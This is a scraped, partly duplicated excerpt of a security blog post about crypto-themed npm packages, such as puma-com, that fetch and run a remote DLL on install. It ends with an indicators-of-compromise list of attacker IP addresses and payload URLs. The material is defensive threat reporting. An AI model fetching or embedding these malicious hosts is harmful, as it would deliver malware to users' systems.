Crypto-Themed npm Packages Found Delivering Stealthy Malware
Contents
Crypto-Themed npm Packages Found Delivering Stealthy Malware
On October 30, 2023 Phylum’s automated risk detection platform alerted us to a strange publication to npm called
puma-com. Upon investigation, we found a very convoluted attack chain that ultimately pulled a remote file, manipulated it in place, called an exported function from that file, and then meticulously covered its tracks by removing and renaming files all along the way. Since then we’ve been tracking four additional packages belonging to this campaign as well. We are currently reverse engineering the DLL, but it hits on 20 vendors on VirusTotal so we’re sure it’s up to no good. Join us as we unravel this convoluted attack.
Background
What’s clever about this attack is that if you install this package and then go take a look at its contents you won’t see any malware. That’s because the installation of the package itself triggers not only the malware deployment, but …
On October 30, 2023 Phylum’s automated risk detection platform alerted us to a strange publication to npm called
puma-com. Upon investigation, we found a very convoluted attack chain that ultimately pulled a remote file, manipulated it in place, called an exported function from that file, and then meticulously covered its tracks by removing and renaming files all along the way. Since then we’ve been tracking four additional packages belonging to this campaign as well. We are currently reverse engineering the DLL, but it hits on 20 vendors on VirusTotal so we’re sure it’s up to no good. Join us as we unravel this convoluted attack.
Background
What’s clever about this attack is that if you install this package and then go take a look at its contents you won’t see any malware. That’s because the installation of the package itself triggers not only the malware deployment, but …
IoC
103.179.142.171
91.206.178.125
http://103.179.142.171/files/npm.mov
http://103.179.142.171/npm/npm.mov
http://91.206.178.125/files/npm.mov
91.206.178.125
http://103.179.142.171/files/npm.mov
http://103.179.142.171/npm/npm.mov
http://91.206.178.125/files/npm.mov